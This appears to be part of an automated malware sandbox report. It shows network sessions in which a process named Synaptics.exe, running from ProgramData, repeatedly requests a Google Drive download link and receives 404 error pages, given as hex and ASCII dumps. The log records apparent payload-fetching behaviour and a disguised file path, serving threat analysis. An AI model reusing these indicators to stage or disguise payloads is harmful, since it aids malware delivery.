                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="s9QOQ/SnE9GOf3gfdQAp+A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:56 UTC612INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:56 UTC612INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        202192.168.2.349976142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:56 UTC609OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:56 UTC612INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:56 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Q3GxPPmT21U+gpPVrRrjwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:56 UTC614INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:56 UTC614INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 41 66 49 77 68 56 45 46 4c 4c 47 52 72 6d 4c 78 35 6d 55 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SAfIwhVEFLLGRrmLx5mUZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:56 UTC615INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:56 UTC615INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        203192.168.2.349977142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:56 UTC612OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:56 UTC615INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:56 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MdE4TVOl/zh2f+lGiYzBbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:56 UTC617INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 68 67 74 76 48 6c 58 31 69 50 6b 36 75 71 2f 66 65 6f 5a 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2hgtvHlX1iPk6uq/feoZZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:56 UTC618INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:56 UTC618INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        204192.168.2.349978142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:56 UTC615OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:56 UTC619INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:56 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-iw3A8xcWghxVSYRjb80Mgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:56 UTC620INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 75 43 52 78 4c 2f 4b 30 34 48 6b 70 61 68 35 52 36 5a 62 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xuCRxL/K04Hkpah5R6ZbvA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:56 UTC621INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:56 UTC622INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        205192.168.2.349979142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:56 UTC618OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:57 UTC622INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:56 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-mfEtUS9qtgOg8tirHW+nlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:57 UTC623INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 71 48 52 61 4c 35 38 67 45 30 6a 5a 36 6e 49 61 4c 4a 66 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wqHRaL58gE0jZ6nIaLJfIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:57 UTC625INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:57 UTC625INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        206192.168.2.349980142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:56 UTC622OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:57 UTC625INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:57 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8T0eton7u+7/AIsHLLy14w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:57 UTC626INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:57 UTC626INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 33 38 61 52 4e 4d 65 4a 38 68 61 5a 2b 33 48 32 76 68 37 39 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="t38aRNMeJ8haZ+3H2vh79g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
